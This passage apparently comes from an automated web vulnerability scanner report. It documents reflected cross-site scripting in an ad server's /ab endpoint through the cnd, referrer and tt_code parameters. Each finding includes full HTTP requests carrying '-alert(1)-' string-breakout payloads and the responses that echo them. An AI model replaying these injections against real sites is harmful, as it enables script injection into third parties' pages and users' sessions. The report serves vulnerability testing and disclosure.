Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:49 GMT
Content-Length: 1710

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
17682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA971ff'-alert(1)-'79037dbfcc8&referrer=http://www.goal.com&media_subtypes=1">
...[SNIP]...

4.69. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e30d8'-alert(1)-'5040089bc5a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQve30d8'-alert(1)-'5040089bc5a&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:36 GMT
Content-Length: 1707

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQve30d8'-alert(1)-'5040089bc5a&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1">
...[SNIP]...

4.70. http://ib.adnxs.com/ab [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67532'-alert(1)-'10502941372 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com67532'-alert(1)-'10502941372&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:54:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:54:03 GMT
Content-Length: 1710

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com67532'-alert(1)-'10502941372&media_subtypes=1">
...[SNIP]...

4.71. http://ib.adnxs.com/ab [tt_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d69e'-alert(1)-'14515927802 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com1d69e'-alert(1)-'14515927802&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:04 GMT
Content-Length: 1811

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com1d69e'-alert(1)-'14515927802&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29